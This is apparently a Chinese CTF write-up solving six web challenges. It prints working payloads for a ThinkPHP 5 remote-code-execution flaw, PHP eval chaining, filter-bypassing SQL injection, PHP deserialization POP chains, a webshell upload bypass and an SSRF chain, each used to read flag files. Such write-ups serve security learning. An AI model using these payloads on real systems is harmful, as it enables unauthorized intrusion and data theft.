目录
①webdog1__start
②ez_rce
③ez_sql
④ez_1zpop
⑤file_maste
⑥Power!
挑了部分题,太简单的就没选进来(但选进来≠有难度)
①webdog1__start
进来没啥东西,右键查看源码
对于0e215962017,md5后也是以0e开头
?web=0e215962017
跳转到/start.php
没啥信息,这里bp抓包看响应头发现hint
访问/f14g.php
继续抓包发现hint(意义何在????)
访问/F1l1l1l1l1lag.php
/F1l1l1l1l1lag.php?get=system('ls');
因为有长度限制,所以我们尝试转接
/F1l1l1l1l1lag.php?get=eval($_GET[1]);&1=system('tac flag.php');
回显
就是说flag在/flag里呗
/F1l1l1l1l1lag.php?get=eval($_GET[1]);&1=system('tac /flag');
拿到flag
②ez_rce
进来先灵魂发问
懒得扫目录了,直接访问/robots.txt
访问/NSS/index.php/
惊了!!是TP5!!
直接检索thinkphp5 漏洞原理分析合集
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /flag
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=tac /flag/flag
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /flag/flag
均无回显
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=printenv
看环境变量
确定flag不在该文件下了
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name flag*
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=tac /nss/ctf/flag/flag /flag /flag
拿到flag
或者其实这类框架漏洞利用的题都是有相应工具能梭的()
③ez_sql
提示用post传参
简单测了一下过滤了空格,注释符绕过,union,or,and,双写绕过即可
nss=1'/**/oorrder/**/by/**/4#
nss=999'/**/ununionion/**/select/**/1,2,3#
999'/**/ununionion/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/infoorrmation_schema.tables/**/where/**/table_schema=database()),3#
999'/**/ununionion/**/select/**/1,(select/**/group_concat(column_name)/**/from/**/infoorrmation_schema.columns/**/where/**/table_schema=database()/**/aandnd/**/table_name='NSS_tb'),3#
999'/**/ununionion/**/select/**/1,(select/**/group_concat(Secr3t,flll444g)/**/from/**/NSS_tb),3#
④ez_1zpop
<?php
error_reporting(0);
class dxg
{
function fmm()
{
return "nonono";
}
}
class lt
{
public $impo='hi';
public $md51='weclome';
public $md52='to NSS';
function __construct()
{
$this->impo = new dxg;
}
function __wakeup()
{
$this->impo = new dxg;
return $this->impo->fmm();
}
function __toString()
{
if (isset($this->impo) && md5($this->md51) == md5($this->md52) && $this->md51 != $this->md52)
return $this->impo->fmm();
}
function __destruct()
{
echo $this;
}
}
class fin
{
public $a;
public $url = 'https://www.ctfer.vip';
public $title;
function fmm()
{
$b = $this->a;
$b($this->title);
}
}
if (isset($_GET['NSS'])) {
$Data = unserialize($_GET['NSS']);
} else {
highlight_file(__file__);
}这个甚至不用搓链子,只要绕过一个wake_up就可以
(echo $this可以直接触发__toString)
构造
$b=new fin();
$a=new lt();
$a->impo=$b;
$b->a='system';
$b->title='tac /flag';
$a->md51='s878926199a';
$a->md52='s155964671a';
echo serialize($a);
最终payload:
?NSS=O:2:"lt":4:{s:4:"impo";O:3:"fin":3:{s:1:"a";s:6:"system";s:3:"url";s:21:"https://www.ctfer.vip";s:5:"title";s:9:"tac /flag";}s:4:"md51";s:11:"s878926199a";s:4:"md52";s:11:"s155964671a";}
⑤file_master
进来页面可以读文件可以传文件
?filename=index.php看源码
MIME检测,文件头检测,文件内容检测
改Content-Type: image/jpeg
文件头
#define height 1
#define width 1
php用短标签即可
访问 /upload/hggmm3ekc10fc6arlp5d03oamr/yjh3.php
下略
⑥Power!
右键查看源码发现提示
?source=index.php
看index.php源码
<?php
class FileViewer{
public $black_list = "flag";
public $local = "http://127.0.0.1/";
public $path;
public function __call($f,$a){
$this->loadfile();
}
public function loadfile(){
if(!is_array($this->path)){
if(preg_match("/".$this->black_list."/i",$this->path)){
$file = $this->curl($this->local."cheems.jpg");
}else{
$file = $this->curl($this->local.$this->path);
}
}else{
$file = $this->curl($this->local."cheems.jpg");
}
echo '<img src="data:jpg;base64,'.base64_encode($file).'"/>';
}
public function curl($path){
$url = $path;
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_HEADER, 0);
$response = curl_exec($curl);
curl_close($curl);
return $response;
}
public function __wakeup(){
$this->local = "http://127.0.0.1/";
}
}
class Backdoor{
public $a;
public $b;
public $superhacker = "hacker.jpg";
public function goodman($i,$j){
$i->$j = $this->superhacker;
}
public function __destruct(){
$this->goodman($this->a,$this->b);
$this->a->c();
}
}
if(isset($_GET['source'])){
highlight_file(__FILE__);
}else{
if(isset($_GET['image_path'])){
$path = $_GET['image_path']; //flag in /flag.php
if(is_string($path)&&!preg_match("/http:|gopher:|glob:|php:/i",$path)){
echo '<img src="data:jpg;base64,'.base64_encode(file_get_contents($path)).'"/>';
}else{
echo '<h2>Seriously??</h2><img src="data:jpg;base64,'.base64_encode(file_get_contents("cheems.jpg")).'"/>';
}
}else if(isset($_GET['path_info'])){
$path_info = $_GET['path_info'];
$FV = unserialize(base64_decode($path_info));
$FV->loadfile();
}else{
$path = "vergil.jpg";
echo '<h2>POWER!!</h2>
<img src="data:jpg;base64,'.base64_encode(file_get_contents($path)).'"/>';
}
}
?> ?image_path=flag.php
点开echo的链接
flag被放在了 127.0.0.1:65500 ,外网无法访问
看来要用SSRF了
搓链子
FileViewer -> Backdoor::__destruct() -> FileViewer::__call() -> FileViewer::loadfile() -> FileViewer::curl()
注意程序在 unserialize 之后会调用 $FV->loadfile();, 如果 $FV 不是 FileViewer 类的实例则会抛出异常, 导致 Backdoor 类的 __destruct 不会成功执行
解决方法就是再实例化一个 FileViewer 对象 将 Backdoor 塞进这个对象的某个属性里 (php 可以反序列化出不存在的属性)
构造
<?php
class FileViewer{
public $local = "http://127.0.0.1:65500/";
public $path = '';
}
class Backdoor{
public $a;
public $b;
public $superhacker;
}
$y = new FileViewer();
$x = new Backdoor();
$x->a = $y;
$x->b = 'local';
$x->superhacker = 'http://127.0.0.1:65500/';
$z = new FileViewer();
$z->test = $x;
echo base64_encode(serialize($z));payload:
?path_info=TzoxMDoiRmlsZVZpZXdlciI6Mzp7czo1OiJsb2NhbCI7czoyMzoiaHR0cDovLzEyNy4wLjAuMTo2NTUwMC8iO3M6NDoicGF0aCI7czowOiIiO3M6NDoidGVzdCI7Tzo4OiJCYWNrZG9vciI6Mzp7czoxOiJhIjtPOjEwOiJGaWxlVmlld2VyIjoyOntzOjU6ImxvY2FsIjtzOjIzOiJodHRwOi8vMTI3LjAuMC4xOjY1NTAwLyI7czo0OiJwYXRoIjtzOjA6IiI7fXM6MToiYiI7czo1OiJsb2NhbCI7czoxMToic3VwZXJoYWNrZXIiO3M6MjM6Imh0dHA6Ly8xMjcuMC4wLjE6NjU1MDAvIjt9fQ==
